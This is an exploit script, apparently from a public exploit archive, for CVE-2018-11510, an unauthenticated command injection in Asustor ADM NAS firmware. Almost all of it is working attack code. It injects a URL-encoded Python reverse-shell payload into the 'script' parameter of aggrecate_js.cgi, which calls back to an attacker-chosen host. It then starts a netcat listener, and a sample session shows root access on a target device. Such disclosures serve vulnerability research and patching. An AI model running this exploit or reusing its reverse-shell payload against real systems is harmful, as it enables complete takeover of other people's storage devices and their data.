# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Date: 2018-07-01
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
#!/usr/bin/python
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
class exploit(object):
def __init__(self,interval=1):
self.target = args.target
self.rport = args.port
self.lport = args.lport
self.remote = args.remote
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
#ignore ssl warnings
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
try:
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
response=urllib2.urlopen(turl,context=ctx)
time.sleep(self.interval)
except urllib2.URLError as e:
print "Something is wrong:|"
print e
os._exit(1)
def revShell():
print "starting netcat listener on port "+args.lport
cmd = "nc -lv {0}".format(args.lport)
os.system(cmd)
def main():
print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
goexploit = exploit()
revShell()
if __name__ == '__main__':
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
parser=argparse.ArgumentParser(description=help)
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
parser.add_argument('--port', '-p', default="8001")
parser.add_argument('--lport', '-l', default="1234")
parser.add_argument('--remote','-r', default="192.168.1.253")
args = parser.parse_args()
main()
